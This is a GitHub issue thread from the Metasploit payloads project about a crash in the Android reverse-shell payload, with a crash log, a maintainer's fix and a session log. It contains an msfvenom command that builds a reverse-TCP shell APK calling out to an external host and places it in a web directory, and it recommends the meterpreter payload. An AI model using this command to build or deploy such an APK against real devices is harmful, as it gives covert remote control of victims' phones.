### ISSUE TITLE
Android Payload Crash

### ISSUE THREAD

**Issue by x011** [rapid7/metasploit-payloads#21]
I've generated the java payload like this:
msfvenom -p android/shell/reverse_tcp LHOST=1.1.1.1 LPORT=443 -f raw -o /var/www/android.apk

Then installed the apk on 2 android phones running android 5.1 and 4.4.
The app crashes after launching, here's the log:

08-17 22:10:30.536: E/AndroidRuntime(29823): FATAL EXCEPTION: Thread-3291
08-17 22:10:30.536: E/AndroidRuntime(29823): Process: com.metasploit.stage, PID: 29823
08-17 22:10:30.536: E/AndroidRuntime(29823): java.lang.ArrayIndexOutOfBoundsException: length=0; index=0
08-17 22:10:30.536: E/AndroidRuntime(29823): 	at com.metasploit.stage.Payload.main(Payload.java:64)
08-17 22:10:30.536: E/AndroidRuntime(29823): 	at com.metasploit.stage.Payload$1.run(Payload.java:42)
08-17 22:10:30.866: E/android.os.Debug(1194): !@Dumpstate > sdumpstate -k -t -z -d -o /data/log/dumpstate_app_error

**Comment by timwr** [comment]
Baffled by this, looks like I broke android/shell/reverse_tcp with the retry options.
I can fix the ArrayIndexOutOfBoundsException with this change:
https://github.com/timwr/metasploit-payloads/commit/d1c6d9ff4142d8cc279740d354a867491533f486
but something is still killing the session (I'm not sure if it's the framework or the payload):
```
[*] Command shell session 1 opened (192.168.1.68:4444 -> 192.168.1.68:50973) at 2015-09-26 16:08:17 +0100
[*] 192.168.1.68 - Command shell session 1 closed.  Reason: Died from EOFError
```
btw I'm afk for a few weeks, but I'll have my phone.

**Comment by timwr** [comment]
@x011 android/meterpreter/reverse_tcp still works fine, so you might better off using that.
